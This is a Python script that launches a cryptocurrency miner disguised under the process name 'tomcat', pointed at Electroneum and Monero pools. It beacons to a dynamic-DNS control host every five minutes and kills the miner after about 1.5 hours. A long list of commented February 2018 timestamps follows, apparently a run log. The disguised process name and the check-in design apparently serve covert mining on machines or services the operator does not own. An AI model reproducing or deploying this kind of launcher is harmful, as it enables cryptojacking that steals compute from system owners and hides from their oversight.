import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:32:06.109090
#2018-02-17 16:18:01.268982
#2018-02-17 18:05:05.603431
#2018-02-17 19:52:05.274979
#2018-02-17 21:41:04.037057
#2018-02-17 23:25:05.415944
#2018-02-18 01:14:03.861610
#2018-02-18 03:02:06.167291
#2018-02-18 04:50:06.332249
#2018-02-18 06:41:04.123613
#2018-02-18 08:29:06.408865
#2018-02-18 10:16:02.051309
#2018-02-18 12:02:02.019022
#2018-02-18 13:47:05.142090
#2018-02-18 15:39:05.588553
#2018-02-18 17:28:02.199166
#2018-02-18 19:15:08.575895
#2018-02-18 21:01:07.396705
#2018-02-18 22:47:01.584176
#2018-02-19 00:35:08.493919
#2018-02-19 02:21:04.906586
#2018-02-19 04:08:07.243927
#2018-02-19 05:52:07.090840
#2018-02-19 07:42:07.680094
#2018-02-19 09:31:01.638691
#2018-02-19 11:21:04.842898
#2018-02-19 13:08:01.462781
#2018-02-19 14:55:10.135650
#2018-02-19 16:44:05.983132
#2018-02-19 18:31:09.978435
#2018-02-19 20:17:06.493772
#2018-02-19 22:06:08.006199
#2018-02-19 23:53:07.282799
#2018-02-20 01:41:04.426513
#2018-02-20 03:29:02.167665
#2018-02-20 05:16:05.508284
#2018-02-20 06:58:04.630321
#2018-02-20 08:45:05.290616
#2018-02-20 10:29:06.590043
#2018-02-20 12:14:07.069134
#2018-02-20 14:02:08.140486
#2018-02-20 15:47:06.142923
#2018-02-20 17:32:09.208725
#2018-02-20 19:21:01.629756
#2018-02-20 21:10:09.455708
#2018-02-20 22:56:07.483567
#2018-02-21 00:41:04.292265
#2018-02-21 02:26:04.035794
#2018-02-21 04:12:06.620841
#2018-02-21 05:58:01.296380
#2018-02-21 07:46:13.173983
#2018-02-21 09:33:01.575976
#2018-02-21 11:21:02.020012
#2018-02-21 13:08:01.684655
#2018-02-21 14:54:01.768663
#2018-02-21 16:41:12.288744
#2018-02-21 18:32:09.123655
#2018-02-21 20:16:09.730661
#2018-02-21 22:04:06.478461
#2018-02-21 23:50:03.087623
#2018-02-22 01:41:02.277853
#2018-02-22 03:29:04.785832
#2018-02-22 05:16:04.252633
#2018-02-22 07:02:03.949431
#2018-02-22 08:50:07.108087
#2018-02-22 10:37:07.759152
#2018-02-22 12:23:03.763121
#2018-02-22 14:07:10.230131
#2018-02-22 15:53:06.924517
#2018-02-22 17:40:07.136418
#2018-02-22 19:26:07.920758
#2018-02-22 21:19:05.479158
#2018-02-22 23:04:04.364167
#2018-02-23 00:50:08.816058
#2018-02-23 02:39:04.853073
#2018-02-23 04:27:07.785269
#2018-02-23 06:14:08.241808
#2018-02-23 08:01:07.924006
#2018-02-23 10:17:07.017252
#2018-02-23 12:13:01.511884
#2018-02-23 13:59:04.300957
#2018-02-23 15:51:07.310688
#2018-02-23 17:36:05.841159
#2018-02-23 19:22:01.254520
#2018-02-23 21:05:08.208062
#2018-02-23 22:51:04.585798
#2018-02-24 00:43:01.372999
#2018-02-24 02:35:07.088005
#2018-02-24 04:28:02.020424
#2018-02-24 06:13:06.888812
#2018-02-24 08:01:05.371473
#2018-02-24 09:46:03.461715
#2018-02-24 11:42:01.668007
#2018-02-24 13:33:06.663927
#2018-02-24 15:21:05.027162
#2018-02-24 17:11:01.443738
#2018-02-24 19:03:06.972791
#2018-02-24 21:58:02.182010
#2018-02-25 02:27:04.680108
#2018-02-25 06:05:08.501700
#2018-02-25 11:38:05.646028